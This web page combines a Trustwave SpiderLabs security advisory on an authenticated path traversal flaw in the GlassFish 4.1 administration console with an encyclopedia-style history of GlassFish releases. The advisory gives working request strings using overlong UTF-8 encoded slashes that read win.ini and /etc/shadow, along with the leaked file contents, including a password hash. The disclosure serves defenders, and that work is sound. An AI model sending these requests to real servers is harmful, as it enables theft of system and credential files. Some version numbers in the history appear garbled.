Glassfish server open source edition 4.1.1 que es
Trustwave SpiderLabs Security Advisory TWSL2015-016: Path Traversal in Oracle GlassFish Server Open Source Edition Published: 08/27/2015 Version: 1.0 Vendor: Oracle Corporation (Project sponsored by Oracle) Product: GlassFish Server Open Source Edition Version affected: 4.1 and prior versions Product description: Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering. The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated. Finding 1: Directory traversal Credit: Piotr Karolak of Trustwave's SpiderLabs #Proof of Concept on Microsoft Windows installation The authenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass, %C0%2F instead of (/),URL encoding. Example: REQUEST ======== GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini Cookie: JSESSIONID=5c47a3575077b014449e17877a0c Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://a.b.c.d:4848/ Host: a.b.c.d:4848 RESPONSE ======== HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.8) Last-Modified: Mon, 12 Jan 2015 10:00:00 GMT Transfer-Encoding: chunked ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=188.8.131.52 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo The response contains the contents of the "win.ini" file, proving that the server allows remote users to download the contents of system files. #Proof of Concept on Linux installation Example: REQUEST ======= GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow/ GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1 Host: a.b.c.d:4848 Accept: */* Accept-Language: en Connection: close RESPONSE ======== HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.7) Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT Date: Tue, 10 Jan 2015 10:00:00 GMT Connection: close Content-Length: 1087 root:!:16436:0:99999:7::: daemon:*:16273:0:99999:7::: bin:*:16273:0:99999:7::: sys:*:16273:0:99999:7::: sync:*:16273:0:99999:7::: TRUNCATED lightdm:*:16273:0:99999:7::: colord:*:16273:0:99999:7::: hplip:*:16273:0:99999:7::: pulse:*:16273:0:99999:7::: test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7::: smmta:*:16436:0:99999:7::: smmsp:*:16436:0:99999:7::: mysql:!:16436:0:99999:7::: Vendor Response: "We plan to fix this issue in the next major GlassFish Server Open Source Edition release." Remediation Steps: No fix is available at this time for the GlassFish Server Open Source Edition release. However, this vulnerability can be mitigated with the use of technologies, such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Please note that Oracle GlassFish Server 3.x which is the current commercial release of GlassFish is not affected. Revision History: 01/12/2015 - Vulnerability disclosed to vendor 02/18/2015 - Notified vendor about the updates to TW security policy 05/19/2015 - Ninety-day deadline exceeded 07/14/2015 - Requested status from vendor 07/31/2015 - Requested status from vendor 08/21/2015 - Notified vendor about public disclosure 08/27/2015 - Advisory published References 1. https://www.owasp.org/index.php/Path_Traversal 2. https://glassfish.java.net/ 3. http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This article is about a software product. For the freshwater and marine fish, see Ambassidae
GlassFish is an open-source Jakarta EE platform application server project started by Sun Microsystems, then sponsored by Oracle Corporation, and now living at the Eclipse Foundation and supported by Payara, Oracle and Red Hat. The supported version under Oracle was called Oracle GlassFish Server. GlassFish is free software and was initially dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the Classpath exception. After having been transferred to Eclipse, GlassFish remained dual-licensed, but the CDDL license was replaced by the Eclipse Public License (EPL).
GlassFish is the Eclipse implementation of Jakarta EE (formerly the reference implementation from Oracle) and as such supports EJB, JPA, JSF, JMS, RMI, JSP, servlets, etc. This allows developers to create enterprise applications that are portable and scalable, and that integrate with legacy technologies. Optional components can also be installed for additional services.
Built on a modular kernel powered by OSGi, GlassFish runs straight on top of the Apache Felix implementation. It also runs with Equinox OSGi or Knopflerfish OSGi runtimes. HK2 abstracts the OSGi module system to provide components, which can also be viewed as services. Such services can be discovered and injected at runtime.
GlassFish is based on source code released by Sun and Oracle Corporation’s TopLink persistence system. It uses a derivative of Apache Tomcat as the servlet container for serving web content, with an added component called Grizzly which uses Java non-blocking I/O (NIO) for scalability and speed.
In October 2003, Sun Microsystems released Sun ONE Application Server 7  that supports the J2EE 1.3 specification. It is based on the iPlanet Web Server and the J2EE reference implementation A basic version is free to download, but not open source.
In March 2004, Sun Microsystems released Sun Java System Application Server 8 that supports the J2EE 1.4 specification. In June 2004 update 1 is released. A basic version is free to download, but not open source.
On 8 February 2005, Sun Microsystems released Sun Java System Application Server 8.1 that supports the J2EE 1.4 specification. This version introduced a major update to web services security (a precursor to the later JASPIC and Jakarta Authentication), Admin Console GUI enhancements, JavaServer Faces 1.1 Support (at this point not yet part of J2EE), performance enhancements, and support for Java SE 5.0. A basic version is free to download, but not open source.
Sun Microsystems launched the GlassFish project on 6 June 2005 by publishing the vetted source of Sun Java System Application Server. Builds of this early version identity themselves in the log as “sun-appserver-pe9.0”.
On 31 January 2006, Sun Microsystems released Sun Java System Application Server 8.2. This version introduced bundling of the Derby database and Fast Infoset for web services. A basic version is free to download, but not open source.
On 4 May 2006, Project GlassFish released the 1.0 version (a.k.a. Sun Java System Application Server 9.0) that supports the Java EE 5 specification.
On 15 May 2006 Sun Java System Application Server 9.0, derived from GlassFish 1.0, is released.
On 8 May 2007 Project SailFin was announced at JavaOne as a sub-project under Project GlassFish. Project SailFin aims to add Session Initiation Protocol (SIP) servlet functionality to GlassFish.
On 17 September 2007 the GlassFish community released version 2.0 (a.k.a. Sun Java System Application Server 9.1) with full enterprise clustering capabilities, Microsoft-interoperable Web Services.
On 21 January 2009 Sun Microsystems and the community released version GlassFish 2.1 (a.k.a. Sun GlassFish Enterprise Server 2.1) which serves as the basis for the Sailfin 1.0 (a.k.a. Sun Communication Application Server 1.0).
SailFin 2.0 (a.k.a. Sun Communication Application Server 2.0) which was released on 28 October 2009 leverages GlassFish 2.1.1 (a.k.a. Sun GlassFish Enterprise Server 2.1.1) and adds a number of features including high availability, rolling upgrade, flexible network topology, better overload protection, Diameter support, improved diagnosability, Java based DCR files for the load balancer, and more.
On 10 December 2009 GlassFish 3.0 (a.k.a. Sun GlassFish Enterprise Server 3.0) was released. Being the Java EE reference implementation, this was the first application server to completely implement Java EE 6 JSR 316. JSR 316 was however approved with reservations. In this version GlassFish adds new features to ease migration from Tomcat to GlassFish. The other main new features are around modularity (GlassFish v3 Prelude already shipped with an Apache Felix OSGi runtime), startup time (a few seconds), deploy-on-change (provided by NetBeans and Eclipse plugins), and session preservation across redeployments.
On 25 March 2010, soon after the acquisition of Sun Microsystems, Oracle issued a Roadmap for versions 3.0.1, 3.1, 3.2 and 4.0 with themes revolving around clustering, virtualization and integration with Coherence and other Oracle technologies. The open source community remains otherwise unaffected.
On 28 February 2011, Oracle Corporation released GlassFish 3.1. This version introduced support for ssh-based provisioning, centralized admin, clustering and load-balancing. It maintains its support for both the Web Profile and full Java EE 6 Platform specifications.
On 28 July 2011, Oracle Corporation released GlassFish 3.1.1. This is fix release for GlassFish 3.1 with multiple component updates (Weld, Mojarra, Jersey, EclipseLink, …), JDK 7 support, AIX support and more.
On 29 February 2012, Oracle Corporation released GlassFish 3.1.2. This release includes bug fixes and new features including administration console enhancements, transaction recovery from a database and new thread pool properties.
On 17 July 2012, Oracle Corporation released GlassFish 184.108.40.206. This is a “micro” release to address some exceptional issues in the product.
On 12 June 2013, Oracle Corporation released GlassFish 4.0. This major release brings Java Platform, Enterprise Edition 7 support.
On 9 September 2014, Oracle Corporation released GlassFish 4.1. This release includes many bug fixes (over a thousand) and the latest MR releases of CDI and WebSockets.
On 7 October 2015, Oracle Corporation released GlassFish 4.1.1. This release includes many bug fixes and security fixes as well as updates to many underlying components.
On 31 March 2017, Oracle Corporation released GlassFish 4.1.2. This release includes bug fixes.
On 21 September 2017, Oracle Corporation released GlassFish 5.0. This release includes Java EE 8 Open Source Reference Implementation and that the Java EE 8 umbrella specification and all the underlying specifications (JAX-RS 2.1, Servlet 4.0, CDI 2.0, JSON-B 1.0, Bean Validation 2.0, etc.) are finalized and approved.
On 29 January 2019, the Eclipse Foundation released GlassFish 5.1. This release is technically identical to Oracle’s GlassFish 5.0 but is fully build from the source code that Oracle transferred to the Eclipse Foundation and which was subsequently relicensed to EPL. Like GlassFish 5.0, 5.1 is Java EE 8 certified, but does not have any RI status. The main goal of this release is to prove that all source code has been transferred and can indeed be built into a fully compliant product.
On 31 December 2020, the Eclipse Foundation released GlassFish 6.0.0. This version is functionally largely identical to GlassFish 5.1 but implements Jakarta EE 9. Jakarta EE 9 is functionally identical to Jakarta EE 8 (which is functionally identical to Java EE 8) but has its package and various constants changed from javax.* to jakarta.*
On 5 May 2021, the Eclipse Foundation released GlassFish 6.1.0. This version is functionally identical to GlassFish 6.0.0 but implements Jakarta EE 9.1. Jakarta EE 9.1 is functionally identical to Jakarta EE 9 (which is functionally identical to Jakarta EE 8 and Java EE 8) but has support for JDK 11. In the months after, 6.2.0 containing Jakarta MVC and the JDK 17 compatible 6.2.1 containing Eclipse Exousia are released.
Roadmap and end of Oracle commercial support
The commercially supported version of GlassFish was known as Oracle GlassFish Server, formerly Sun GlassFish Enterprise Server, and previously Sun Java System Application Server (SJSAS) has a history, along with other iPlanet software, going back to Netscape Application Server. This includes code from other companies such as Oracle Corporation for TopLink Essentials. Ericsson’s SIP Servlet support is included, the opensource version of it is SailFish, developing towards JSR-289. In 2010, the difference between the commercial and open source edition was already quite small.
On 4 November 2013, Oracle announced the future roadmap for Java EE and Glassfish Server, with a 4.1 open-source edition planned and continuing open-sources updates to GlassFish but with an end to commercial Oracle support. Commercial customers have instead been encouraged to transition to Oracle’s alternative product, Oracle WebLogic Server.
In response to Oracle’s announcement to end commercial support for GlassFish, a fork called Payara Server was created and released in October 2014. Payara Server is open source under the same licenses as GlassFish, but has optional commercial support.
Open-source GlassFish continued under Oracle till version 5.0 (the reference implementation for Java EE 8) after which the source code was donated to the Eclipse Foundation, which released the technically identical but relicensed version 5.1. At Eclipse, Payara is leading the GlassFish project, with support from Oracle and Red Hat.
A GlassFish 5.2 release was planned as a Jakarta EE 8 compatible implementation, but was never released. Jakarta EE 8 is functionally identical to Java EE 8, but was created via the Eclipse Foundation Specification Process (EFSP).
Other CDDL-licensed, Java-based services:
Other Jakarta EE application servers: